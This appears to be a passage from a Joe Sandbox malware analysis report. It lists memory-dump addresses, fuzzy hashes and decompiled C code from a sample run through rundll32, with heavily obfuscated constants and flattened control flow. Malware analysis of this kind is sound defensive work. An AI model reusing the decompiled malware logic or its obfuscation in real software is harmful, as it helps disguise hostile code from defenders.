                                                                                                                                  0x002d26dc
                                                                                                                                  0x002d26e4
                                                                                                                                  0x002d26ef
                                                                                                                                  0x002d26fa
                                                                                                                                  0x002d26fa
                                                                                                                                  0x002d2705
                                                                                                                                  0x002d2705
                                                                                                                                  0x002d2705
                                                                                                                                  0x002d2705
                                                                                                                                  0x002d2707
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d270d
                                                                                                                                  0x002d282a
                                                                                                                                  0x002d282f
                                                                                                                                  0x002d2832
                                                                                                                                  0x00000000
                                                                                                                                  0x002d2713
                                                                                                                                  0x002d2719
                                                                                                                                  0x002d2808
                                                                                                                                  0x002d280a
                                                                                                                                  0x002d280d
                                                                                                                                  0x00000000
                                                                                                                                  0x002d271f
                                                                                                                                  0x002d2725
                                                                                                                                  0x002d27f2
                                                                                                                                  0x002d27f7
                                                                                                                                  0x002d27fa
                                                                                                                                  0x00000000
                                                                                                                                  0x002d272b
                                                                                                                                  0x002d2731
                                                                                                                                  0x002d27c0
                                                                                                                                  0x002d27c5
                                                                                                                                  0x002d27c8
                                                                                                                                  0x00000000
                                                                                                                                  0x002d2733
                                                                                                                                  0x002d2739
                                                                                                                                  0x002d278b
                                                                                                                                  0x002d2790
                                                                                                                                  0x002d2793
                                                                                                                                  0x00000000
                                                                                                                                  0x002d273b
                                                                                                                                  0x002d2741
                                                                                                                                  0x00000000
                                                                                                                                  0x002d2747
                                                                                                                                  0x002d2756
                                                                                                                                  0x002d2757
                                                                                                                                  0x002d2758
                                                                                                                                  0x002d275d
                                                                                                                                  0x002d2763
                                                                                                                                  0x002d2769
                                                                                                                                  0x00000000
                                                                                                                                  0x002d2769
                                                                                                                                  0x002d2763
                                                                                                                                  0x002d2741
                                                                                                                                  0x002d2739
                                                                                                                                  0x002d2731
                                                                                                                                  0x002d2725
                                                                                                                                  0x002d2719
                                                                                                                                  0x002d293e
                                                                                                                                  0x002d2940
                                                                                                                                  0x002d2945
                                                                                                                                  0x002d2945
                                                                                                                                  0x002d294f
                                                                                                                                  0x002d294f
                                                                                                                                  0x002d283c
                                                                                                                                  0x002d2842
                                                                                                                                  0x002d28fd
                                                                                                                                  0x002d2902
                                                                                                                                  0x002d2905
                                                                                                                                  0x00000000
                                                                                                                                  0x002d2848

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !B {$#8$)e$3{$N<@$R2G$d[$e.($nx~$nx~$e
                                                                                                                                  • API String ID: 0-245365489
                                                                                                                                  • Opcode ID: d6ff080ff9f5287ceac9ee7533765cfdb866e133be372a7cbfdcda9caf8f2759
                                                                                                                                  • Instruction ID: 283cbb46493f02c7fb43ef7c775cee4779317ca01b96d86634dc496dda10932a
                                                                                                                                  • Opcode Fuzzy Hash: d6ff080ff9f5287ceac9ee7533765cfdb866e133be372a7cbfdcda9caf8f2759
                                                                                                                                  • Instruction Fuzzy Hash: 41F14071518380DFD768CF61C58A65BFBF1FBD4348F20891DE29A8A261D7B18958CF42
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E002D9714(void* __ecx, void* __edx) {
                                                                                                                                  				signed int _v4;
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				signed int _v80;
                                                                                                                                  				signed int _v84;
                                                                                                                                  				signed int _v88;
                                                                                                                                  				signed int _v92;
                                                                                                                                  				signed int _v96;
                                                                                                                                  				signed int _v100;
                                                                                                                                  				signed int _v104;
                                                                                                                                  				void* _t251;
                                                                                                                                  				intOrPtr _t252;
                                                                                                                                  				intOrPtr _t253;
                                                                                                                                  				void* _t257;
                                                                                                                                  				signed int _t259;
                                                                                                                                  				signed int _t260;
                                                                                                                                  				signed int _t261;
                                                                                                                                  				signed int _t262;
                                                                                                                                  				signed int _t263;
                                                                                                                                  				signed int _t264;
                                                                                                                                  				void* _t292;
                                                                                                                                  				void* _t293;
                                                                                                                                  				signed int* _t296;
                                                                                                                                  				signed int* _t297;
                                                                                                                                  
                                                                                                                                  				_t296 =  &_v104;
                                                                                                                                  				_v4 = _v4 & 0x00000000;
                                                                                                                                  				_v12 = 0xc5b764;
                                                                                                                                  				_v8 = 0xb6da07;
                                                                                                                                  				_v100 = 0x6b81aa;
                                                                                                                                  				_v100 = _v100 ^ 0x5133456b;
                                                                                                                                  				_t8 =  &_v100; // 0x5133456b
                                                                                                                                  				_v100 =  *_t8 * 0x6e;
                                                                                                                                  				_t292 = __edx;
                                                                                                                                  				_v100 = _v100 << 0xa;
                                                                                                                                  				_v100 = _v100 ^ 0x922ec96f;
                                                                                                                                  				_t257 = __ecx;
                                                                                                                                  				_v20 = 0x2c208b;
                                                                                                                                  				_t293 = 0x52ffaa2;
                                                                                                                                  				_v20 = _v20 + 0xffff37e6;
                                                                                                                                  				_v20 = _v20 ^ 0x00212911;
                                                                                                                                  				_v60 = 0xb21c01;
                                                                                                                                  				_v60 = _v60 ^ 0x31980a41;
                                                                                                                                  				_v60 = _v60 + 0xffff033c;
                                                                                                                                  				_v60 = _v60 ^ 0x31255444;
                                                                                                                                  				_v64 = 0x612501;
                                                                                                                                  				_v64 = _v64 << 2;
                                                                                                                                  				_v64 = _v64 + 0xf44;
                                                                                                                                  				_v64 = _v64 ^ 0x018d6347;
                                                                                                                                  				_v52 = 0x111460;
                                                                                                                                  				_v52 = _v52 + 0xffffc2ff;
                                                                                                                                  				_v52 = _v52 | 0x8d441097;
                                                                                                                                  				_v52 = _v52 ^ 0x8d5fe5cb;
                                                                                                                                  				_v56 = 0xb6e38a;
                                                                                                                                  				_t259 = 0x67;
                                                                                                                                  				_v56 = _v56 / _t259;
                                                                                                                                  				_t260 = 0x41;
                                                                                                                                  				_v56 = _v56 * 0x32;
                                                                                                                                  				_v56 = _v56 ^ 0x00536033;
                                                                                                                                  				_v96 = 0xaa1e09;
                                                                                                                                  				_v96 = _v96 / _t260;
                                                                                                                                  				_t261 = 0x73;
                                                                                                                                  				_v96 = _v96 * 0xd;
                                                                                                                                  				_v96 = _v96 / _t261;
                                                                                                                                  				_v96 = _v96 ^ 0x00047537;
                                                                                                                                  				_v88 = 0xebbfc;
                                                                                                                                  				_v88 = _v88 << 7;
                                                                                                                                  				_v88 = _v88 | 0x3053ba58;
                                                                                                                                  				_t262 = 0x7f;
                                                                                                                                  				_v88 = _v88 / _t262;
                                                                                                                                  				_v88 = _v88 ^ 0x006c206b;
                                                                                                                                  				_v44 = 0xece271;
                                                                                                                                  				_v44 = _v44 + 0xffff86ef;
                                                                                                                                  				_v44 = _v44 + 0x6a70;
                                                                                                                                  				_v44 = _v44 ^ 0x00eb9b45;
                                                                                                                                  				_v48 = 0xd70038;
                                                                                                                                  				_v48 = _v48 | 0x378b661e;
                                                                                                                                  				_v48 = _v48 ^ 0xfc23f8e2;
                                                                                                                                  				_v48 = _v48 ^ 0xcbf8b4c1;
                                                                                                                                  				_v92 = 0x86f3ef;
                                                                                                                                  				_v92 = _v92 << 0xd;
                                                                                                                                  				_v92 = _v92 >> 0xd;
                                                                                                                                  				_v92 = _v92 + 0x4513;
                                                                                                                                  				_v92 = _v92 ^ 0x000ef1b6;
                                                                                                                                  				_v80 = 0x7a204;
                                                                                                                                  				_v80 = _v80 + 0xffffa60a;
                                                                                                                                  				_v80 = _v80 | 0x4d150135;
                                                                                                                                  				_v80 = _v80 + 0xffff9d32;
                                                                                                                                  				_v80 = _v80 ^ 0x4d179d3b;
                                                                                                                                  				_v40 = 0x124198;
                                                                                                                                  				_v40 = _v40 ^ 0x5335feb3;
                                                                                                                                  				_t263 = 0x78;
                                                                                                                                  				_v40 = _v40 * 0x18;
                                                                                                                                  				_v40 = _v40 ^ 0xcbb00a78;
                                                                                                                                  				_v84 = 0xcaa24a;
                                                                                                                                  				_v84 = _v84 * 0x42;
                                                                                                                                  				_v84 = _v84 ^ 0x45be5790;
                                                                                                                                  				_v84 = _v84 + 0xffff0d2f;
                                                                                                                                  				_v84 = _v84 ^ 0x718e360f;
                                                                                                                                  				_v24 = 0x4d7038;
                                                                                                                                  				_v24 = _v24 | 0x28b75b7a;
                                                                                                                                  				_v24 = _v24 ^ 0x28f4655f;
                                                                                                                                  				_v28 = 0x844762;
                                                                                                                                  				_v28 = _v28 ^ 0xe0e1df8a;
                                                                                                                                  				_v28 = _v28 ^ 0xe064bc9e;
                                                                                                                                  				_v32 = 0xfc2930;
                                                                                                                                  				_v32 = _v32 / _t263;
                                                                                                                                  				_v32 = _v32 ^ 0x00028374;
                                                                                                                                  				_v104 = 0xce3f74;
                                                                                                                                  				_v104 = _v104 + 0x3224;
                                                                                                                                  				_v104 = _v104 + 0x85ca;
                                                                                                                                  				_t264 = 0xe;
                                                                                                                                  				_v104 = _v104 / _t264;
                                                                                                                                  				_v104 = _v104 ^ 0x0007887d;
                                                                                                                                  				_v68 = 0x11fdc1;
                                                                                                                                  				_v68 = _v68 | 0x0fd109af;
                                                                                                                                  				_t265 = 0x52;
                                                                                                                                  				_v68 = _v68 / _t265;
                                                                                                                                  				_v68 = _v68 ^ 0x00367c27;
                                                                                                                                  				_v72 = 0xa9a7e;
                                                                                                                                  				_v72 = _v72 * 0x16;
                                                                                                                                  				_v72 = _v72 ^ 0xca0bce5f;
                                                                                                                                  				_v72 = _v72 ^ 0xcae4b7d2;
                                                                                                                                  				_v76 = 0xb2d6c0;
                                                                                                                                  				_v76 = _v76 + 0xffff5dcd;
                                                                                                                                  				_v76 = _v76 >> 0xe;
                                                                                                                                  				_v76 = _v76 >> 4;
                                                                                                                                  				_v76 = _v76 ^ 0x0002e66e;
                                                                                                                                  				_v16 = 0x41627;
                                                                                                                                  				_v16 = _v16 + 0xccf7;
                                                                                                                                  				_v16 = _v16 ^ 0x00091dff;
                                                                                                                                  				_v36 = 0xd94625;
                                                                                                                                  				_v36 = _v36 + 0x741;
                                                                                                                                  				_v36 = _v36 << 0x10;
                                                                                                                                  				_v36 = _v36 ^ 0x4d68793e;
                                                                                                                                  				while(1) {
                                                                                                                                  					L1:
                                                                                                                                  					_t251 = 0xc3f018b;
                                                                                                                                  					do {
                                                                                                                                  						L2:
                                                                                                                                  						while(_t293 != 0x52ffaa2) {
                                                                                                                                  							if(_t293 == 0x865547f) {
                                                                                                                                  								_t265 = _v80;
                                                                                                                                  								_t252 = E002DCDAE(_v80, _v40, _v84,  *((intOrPtr*)(_t292 + 0x38)));
                                                                                                                                  								_t296 =  &(_t296[2]);
                                                                                                                                  								 *((intOrPtr*)(_t292 + 0x1c)) = _t252;
                                                                                                                                  								__eflags = _t252;
                                                                                                                                  								_t251 = 0xc3f018b;
                                                                                                                                  								_t293 =  !=  ? 0xc3f018b : 0xb7a2405;
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							if(_t293 == 0xb133873) {
                                                                                                                                  								_push(_v64);
                                                                                                                                  								_t253 = E002EC3A0(_t257, _v100, __eflags, _v20, _v60, _t265);
                                                                                                                                  								_t297 =  &(_t296[4]);
                                                                                                                                  								 *((intOrPtr*)(_t292 + 0x38)) = _t253;
                                                                                                                                  								__eflags = _t253;
                                                                                                                                  								if(_t253 != 0) {
                                                                                                                                  									E002D7B8B( *((intOrPtr*)(_t292 + 0x38)), _v52,  *((intOrPtr*)(_t292 + 0x38)), _v56, _v96);
                                                                                                                                  									_push( *((intOrPtr*)(_t292 + 0x38)));
                                                                                                                                  									_push(_v92);
                                                                                                                                  									_push(_v48);
                                                                                                                                  									_t265 = _v88;
                                                                                                                                  									E002D7C37(_v88, _v44);
                                                                                                                                  									_t296 =  &(_t297[6]);
                                                                                                                                  									_t293 = 0x865547f;
                                                                                                                                  									goto L1;
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								if(_t293 == 0xb7a2405) {
                                                                                                                                  									return E002E9E56(_v76, _v16, _v36,  *((intOrPtr*)(_t292 + 0x38)));
                                                                                                                                  								}
                                                                                                                                  								if(_t293 != _t251) {
                                                                                                                                  									goto L13;
                                                                                                                                  								} else {
                                                                                                                                  									_t253 = E002D46BE(_t265, _v24, _t265, _v28, _t265, _v32, _v104, _v68, _t265, _t292, E002D219A, _v72);
                                                                                                                                  									_t296 =  &(_t296[0xa]);
                                                                                                                                  									 *((intOrPtr*)(_t292 + 0x2c)) = _t253;
                                                                                                                                  									if(_t253 == 0) {
                                                                                                                                  										_t293 = 0xb7a2405;
                                                                                                                                  										while(1) {
                                                                                                                                  											L1:
                                                                                                                                  											_t251 = 0xc3f018b;
                                                                                                                                  											goto L2;
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							return _t253;
                                                                                                                                  						}
                                                                                                                                  						_t293 = 0xb133873;
                                                                                                                                  						L13:
                                                                                                                                  						__eflags = _t293 - 0x1aeb2e;
                                                                                                                                  					} while (__eflags != 0);
                                                                                                                                  					return _t251;
                                                                                                                                  				}
                                                                                                                                  			}












































                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $2$'|6$3`S$8$8pM$>yhM$DT%1$k l$kE3Q$pj$q
                                                                                                                                  • API String ID: 0-1622084174
                                                                                                                                  • Opcode ID: 996c152d7e78cd185da3708c2b3c1cf4f07f1b27b5ba4c4fbb5efb1dc0b2e430
                                                                                                                                  • Instruction ID: 03bd2238df6a9160eca131d05f1e83b01ddc727d2e85b822597411cb942a4122
                                                                                                                                  • Opcode Fuzzy Hash: 996c152d7e78cd185da3708c2b3c1cf4f07f1b27b5ba4c4fbb5efb1dc0b2e430
                                                                                                                                  • Instruction Fuzzy Hash: 59B130725183419FC398CF25C58A40BFBE1FBC4758F50891EF59A96220D3B5D969CF82
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                  			E002D64E2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                                  				char _v260;
                                                                                                                                  				signed int _v264;
                                                                                                                                  				intOrPtr _v268;
                                                                                                                                  				char _v276;
                                                                                                                                  				signed int _v280;
                                                                                                                                  				signed int _v284;
                                                                                                                                  				signed int _v288;
                                                                                                                                  				signed int _v292;
                                                                                                                                  				signed int _v296;
                                                                                                                                  				signed int _v300;
                                                                                                                                  				signed int _v304;
                                                                                                                                  				signed int _v308;
                                                                                                                                  				signed int _v312;
                                                                                                                                  				signed int _v316;
                                                                                                                                  				signed int _v320;
                                                                                                                                  				signed int _v324;
                                                                                                                                  				signed int _v328;
                                                                                                                                  				signed int _v332;
                                                                                                                                  				signed int _v336;
                                                                                                                                  				signed int _v340;
                                                                                                                                  				signed int _v344;
                                                                                                                                  				signed int _v348;
                                                                                                                                  				signed int _v352;
                                                                                                                                  				signed int _v356;
                                                                                                                                  				signed int _v360;
                                                                                                                                  				signed int _v364;
                                                                                                                                  				signed int _v368;
                                                                                                                                  				signed int _v372;
                                                                                                                                  				signed int _v376;
                                                                                                                                  				signed int _v380;
                                                                                                                                  				signed int _v384;
                                                                                                                                  				signed int _v388;
                                                                                                                                  				signed int _v392;
                                                                                                                                  				signed int _v396;
                                                                                                                                  				signed int _v400;
                                                                                                                                  				signed int _v404;
                                                                                                                                  				signed int _v408;
                                                                                                                                  				signed int _v412;
                                                                                                                                  				void* _t311;
                                                                                                                                  				void* _t332;
                                                                                                                                  				intOrPtr _t335;
                                                                                                                                  				intOrPtr _t338;
                                                                                                                                  				intOrPtr _t343;
                                                                                                                                  				void* _t345;
                                                                                                                                  				void* _t347;
                                                                                                                                  				void* _t349;
                                                                                                                                  				void* _t352;
                                                                                                                                  				intOrPtr _t359;
                                                                                                                                  				intOrPtr _t361;
                                                                                                                                  				intOrPtr* _t362;
                                                                                                                                  				intOrPtr _t364;
                                                                                                                                  				signed int _t367;
                                                                                                                                  				intOrPtr _t386;
                                                                                                                                  				intOrPtr _t387;
                                                                                                                                  				intOrPtr _t413;
                                                                                                                                  				signed int _t414;
                                                                                                                                  				signed int _t415;
                                                                                                                                  				signed int _t416;
                                                                                                                                  				signed int _t417;
                                                                                                                                  				signed int _t418;
                                                                                                                                  				signed int _t419;
                                                                                                                                  				signed int _t420;
                                                                                                                                  				signed int _t421;
                                                                                                                                  				signed int _t422;
                                                                                                                                  				void* _t423;
                                                                                                                                  				signed int* _t425;
                                                                                                                                  				void* _t427;
                                                                                                                                  
                                                                                                                                  				_push(_a24);
                                                                                                                                  				_t423 = __edx;
                                                                                                                                  				_push(_a20);
                                                                                                                                  				_push(_a16);
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t311);
                                                                                                                                  				_v264 = _v264 & 0x00000000;
                                                                                                                                  				_t425 =  &(( &_v412)[8]);
                                                                                                                                  				_v268 = 0x38f10b;
                                                                                                                                  				_v376 = 0x1d6e4;
                                                                                                                                  				_t364 = 0;
                                                                                                                                  				_v376 = _v376 + 0x2cf5;
                                                                                                                                  				_t367 = 0x349a1a2;
                                                                                                                                  				_v376 = _v376 + 0xffffbc4f;
                                                                                                                                  				_v376 = _v376 + 0xc828;
                                                                                                                                  				_v376 = _v376 ^ 0x000c4abe;
                                                                                                                                  				_v344 = 0xf0b614;
                                                                                                                                  				_t415 = 0x49;
                                                                                                                                  				_v344 = _v344 / _t415;
                                                                                                                                  				_v344 = _v344 ^ 0x0006b22b;
                                                                                                                                  				_v296 = 0xc48c2;
                                                                                                                                  				_v296 = _v296 >> 0xa;
                                                                                                                                  				_v296 = _v296 ^ 0x0001ad51;
                                                                                                                                  				_v384 = 0x7feda9;
                                                                                                                                  				_t416 = 0x39;
                                                                                                                                  				_v384 = _v384 * 0x1a;
                                                                                                                                  				_v384 = _v384 ^ 0x3da8c069;
                                                                                                                                  				_v384 = _v384 + 0xffff691b;
                                                                                                                                  				_v384 = _v384 ^ 0x315a0b75;
                                                                                                                                  				_v400 = 0x77d138;
                                                                                                                                  				_v400 = _v400 + 0xffff5a87;
                                                                                                                                  				_v400 = _v400 << 3;
                                                                                                                                  				_v400 = _v400 + 0xffff9ef2;
                                                                                                                                  				_v400 = _v400 ^ 0x03bdd381;
                                                                                                                                  				_v312 = 0x267902;
                                                                                                                                  				_v312 = _v312 | 0xf93e454e;
                                                                                                                                  				_v312 = _v312 ^ 0xf93fe769;
                                                                                                                                  				_v308 = 0x6d5338;
                                                                                                                                  				_v308 = _v308 ^ 0x3f4c4be5;
                                                                                                                                  				_v308 = _v308 ^ 0x3f211e75;
                                                                                                                                  				_v328 = 0x5e1da9;
                                                                                                                                  				_v328 = _v328 / _t416;
                                                                                                                                  				_v328 = _v328 ^ 0x000cc368;
                                                                                                                                  				_v364 = 0xd2dbf2;
                                                                                                                                  				_v364 = _v364 + 0xffffefaa;
                                                                                                                                  				_v364 = _v364 + 0xd543;
                                                                                                                                  				_v364 = _v364 ^ 0x00d6d9fb;
                                                                                                                                  				_v304 = 0x235f1e;
                                                                                                                                  				_t417 = 0x2e;
                                                                                                                                  				_v304 = _v304 / _t417;
                                                                                                                                  				_v304 = _v304 ^ 0x000b3ded;
                                                                                                                                  				_v320 = 0xc8231f;
                                                                                                                                  				_v320 = _v320 << 0xc;
                                                                                                                                  				_v320 = _v320 ^ 0x8237c00a;
                                                                                                                                  				_v356 = 0xee2c9b;
                                                                                                                                  				_v356 = _v356 ^ 0xa0da06c4;
                                                                                                                                  				_v356 = _v356 ^ 0xf246f640;
                                                                                                                                  				_v356 = _v356 ^ 0x52703357;
                                                                                                                                  				_v412 = 0xc100a3;
                                                                                                                                  				_v412 = _v412 ^ 0xb8e7c080;
                                                                                                                                  				_v412 = _v412 ^ 0xb6721a67;
                                                                                                                                  				_v412 = _v412 ^ 0xff44de7f;
                                                                                                                                  				_v412 = _v412 ^ 0xf11e2702;
                                                                                                                                  				_v396 = 0xa6af25;
                                                                                                                                  				_v396 = _v396 << 0x10;
                                                                                                                                  				_v396 = _v396 >> 7;
                                                                                                                                  				_v396 = _v396 + 0xffff7054;
                                                                                                                                  				_v396 = _v396 ^ 0x015ec427;
                                                                                                                                  				_v404 = 0x1f48c8;
                                                                                                                                  				_t418 = 0x2d;
                                                                                                                                  				_v404 = _v404 / _t418;
                                                                                                                                  				_v404 = _v404 << 0xb;
                                                                                                                                  				_v404 = _v404 | 0x7455ca98;
                                                                                                                                  				_v404 = _v404 ^ 0x75da0b0a;
                                                                                                                                  				_v368 = 0x174318;
                                                                                                                                  				_v368 = _v368 + 0x805d;
                                                                                                                                  				_v368 = _v368 ^ 0x0012ca04;
                                                                                                                                  				_v408 = 0x579c92;
                                                                                                                                  				_t419 = 0x65;
                                                                                                                                  				_v408 = _v408 * 0x61;
                                                                                                                                  				_v408 = _v408 ^ 0x6a2d4e62;
                                                                                                                                  				_v408 = _v408 + 0xd9d0;
                                                                                                                                  				_v408 = _v408 ^ 0x4b1c9053;
                                                                                                                                  				_v392 = 0x2598b2;
                                                                                                                                  				_v392 = _v392 * 0xd;
                                                                                                                                  				_v392 = _v392 ^ 0xb79fc0d8;
                                                                                                                                  				_v392 = _v392 + 0xffff9085;
                                                                                                                                  				_v392 = _v392 ^ 0xb671271d;
                                                                                                                                  				_v324 = 0x8734;
                                                                                                                                  				_v324 = _v324 + 0xffff82f4;
                                                                                                                                  				_v324 = _v324 ^ 0x000c0e93;
                                                                                                                                  				_v332 = 0x81f499;
                                                                                                                                  				_v332 = _v332 ^ 0xcb023f28;
                                                                                                                                  				_v332 = _v332 ^ 0xcb8aeffa;
                                                                                                                                  				_v340 = 0xbb3951;
                                                                                                                                  				_v340 = _v340 ^ 0x050a1ed9;
                                                                                                                                  				_v340 = _v340 ^ 0x05b74055;
                                                                                                                                  				_v372 = 0x5c4d3f;
                                                                                                                                  				_v372 = _v372 + 0xffffba18;
                                                                                                                                  				_v372 = _v372 | 0xc0b40c25;
                                                                                                                                  				_v372 = _v372 >> 3;
                                                                                                                                  				_v372 = _v372 ^ 0x1815f0ae;
                                                                                                                                  				_v380 = 0xe44e59;
                                                                                                                                  				_v380 = _v380 + 0x7d25;
                                                                                                                                  				_v380 = _v380 + 0xffff00c0;
                                                                                                                                  				_v380 = _v380 << 0xa;
                                                                                                                                  				_v380 = _v380 ^ 0x8f30862d;
                                                                                                                                  				_v360 = 0x1cbdf;
                                                                                                                                  				_v360 = _v360 + 0xffff6e4b;
                                                                                                                                  				_v360 = _v360 >> 8;
                                                                                                                                  				_v360 = _v360 ^ 0x0001cec6;
                                                                                                                                  				_v348 = 0xf4499d;
                                                                                                                                  				_v348 = _v348 + 0x832d;
                                                                                                                                  				_v348 = _v348 << 2;
                                                                                                                                  				_v348 = _v348 ^ 0x03dc7480;
                                                                                                                                  				_v352 = 0x4c1d4a;
                                                                                                                                  				_v352 = _v352 >> 0xd;
                                                                                                                                  				_v352 = _v352 * 0xe;
                                                                                                                                  				_v352 = _v352 ^ 0x0003e302;
                                                                                                                                  				_v388 = 0x7e89b7;
                                                                                                                                  				_v388 = _v388 / _t419;
                                                                                                                                  				_t420 = 0x48;
                                                                                                                                  				_v388 = _v388 / _t420;
                                                                                                                                  				_t421 = 0x2b;
                                                                                                                                  				_t414 = _v368;
                                                                                                                                  				_v388 = _v388 / _t421;
                                                                                                                                  				_v388 = _v388 ^ 0x000ed69e;
                                                                                                                                  				_t422 = _v368;
                                                                                                                                  				_v300 = 0xe9da01;
                                                                                                                                  				_v300 = _v300 + 0xffffd878;
                                                                                                                                  				_v300 = _v300 ^ 0x00eb5be0;
                                                                                                                                  				_v336 = 0x6aaf6d;
                                                                                                                                  				_v336 = _v336 * 0x22;
                                                                                                                                  				_v336 = _v336 ^ 0x0e2b42a4;
                                                                                                                                  				_v316 = 0x54d710;
                                                                                                                                  				_v316 = _v316 >> 0xc;
                                                                                                                                  				_v316 = _v316 ^ 0x0000014d;
                                                                                                                                  				while(1) {
                                                                                                                                  					L1:
                                                                                                                                  					_t332 = 0x61250f6;
                                                                                                                                  					do {
                                                                                                                                  						while(1) {
                                                                                                                                  							L2:
                                                                                                                                  							_t427 = _t367 - _t332;
                                                                                                                                  							if(_t427 > 0) {
                                                                                                                                  								break;
                                                                                                                                  							}
                                                                                                                                  							if(_t427 == 0) {
                                                                                                                                  								_t352 = E002E0AE0(0x40, 1);
                                                                                                                                  								_push(_v320);
                                                                                                                                  								_push( &_v260);
                                                                                                                                  								_push(_t352);
                                                                                                                                  								_push(0xb);
                                                                                                                                  								E002D80E3(_v364, _v304);
                                                                                                                                  								_t425 =  &(_t425[6]);
                                                                                                                                  								_t367 = 0x97954ea;
                                                                                                                                  								while(1) {
                                                                                                                                  									L1:
                                                                                                                                  									_t332 = 0x61250f6;
                                                                                                                                  									goto L2;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							if(_t367 == 0x2db8754) {
                                                                                                                                  								E002E8519(_v360, _v348, _v292);
                                                                                                                                  								E002E8519(_v352, _v388, _t422);
                                                                                                                                  								E002E8519(_v300, _v336, _v284);
                                                                                                                                  								_t367 = _t414;
                                                                                                                                  								L33:
                                                                                                                                  								_t332 = 0x61250f6;
                                                                                                                                  								goto L34;
                                                                                                                                  							}
                                                                                                                                  							if(_t367 == 0x349a1a2) {
                                                                                                                                  								_t422 = 0;
                                                                                                                                  								E002D4B61( &_v260, 0x100, _v376, _v344);
                                                                                                                                  								_v284 = _v284 & 0;
                                                                                                                                  								_v280 = _v280 & 0;
                                                                                                                                  								_v292 = _v292 & 0;
                                                                                                                                  								_v288 = _v288 & 0;
                                                                                                                                  								_t367 = 0xea9523f;
                                                                                                                                  								while(1) {
                                                                                                                                  									L1:
                                                                                                                                  									_t332 = 0x61250f6;
                                                                                                                                  									goto L2;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							if(_t367 == 0x47b49b8) {
                                                                                                                                  								if(_v288 >= _v316) {
                                                                                                                                  									_t359 = E002EF435( &_v292,  &_v284);
                                                                                                                                  								} else {
                                                                                                                                  									_t359 = E002EA666( &_v292);
                                                                                                                                  								}
                                                                                                                                  								_t422 = _t359;
                                                                                                                                  								_t332 = 0x61250f6;
                                                                                                                                  								_t367 =  !=  ? 0x61250f6 : 0x2db8754;
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							if(_t367 != 0x54d1846) {
                                                                                                                                  								goto L34;
                                                                                                                                  							}
                                                                                                                                  							_t386 =  *0x2f3e08; // 0x0
                                                                                                                                  							_t361 =  *((intOrPtr*)( *((intOrPtr*)(_t386 + 4))));
                                                                                                                                  							 *((intOrPtr*)(_t386 + 0x14)) =  *((intOrPtr*)(_t386 + 0x14)) + 1;
                                                                                                                                  							_t413 =  *((intOrPtr*)(_t386 + 0x14));
                                                                                                                                  							 *((intOrPtr*)(_t386 + 4)) = _t361;
                                                                                                                                  							if(_t361 == 0) {
                                                                                                                                  								 *((intOrPtr*)(_t386 + 4)) =  *((intOrPtr*)(_t386 + 0x20));
                                                                                                                                  							}
                                                                                                                                  							_t362 =  *0x2f3e08; // 0x0
                                                                                                                                  							if(_t413 >=  *_t362) {
                                                                                                                                  								_t387 =  *0x2f3e08; // 0x0
                                                                                                                                  								 *(_t387 + 0x14) =  *(_t387 + 0x14) & 0x00000000;
                                                                                                                                  								L37:
                                                                                                                                  								return _t364;
                                                                                                                                  							} else {
                                                                                                                                  								_t367 = 0x349a1a2;
                                                                                                                                  								while(1) {
                                                                                                                                  									L1:
                                                                                                                                  									_t332 = 0x61250f6;
                                                                                                                                  									goto L2;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						if(_t367 == 0x70f4b52) {
                                                                                                                                  							E002E8519(_v372, _v380, _v276);
                                                                                                                                  							_t367 = 0x2db8754;
                                                                                                                                  							goto L33;
                                                                                                                                  						}
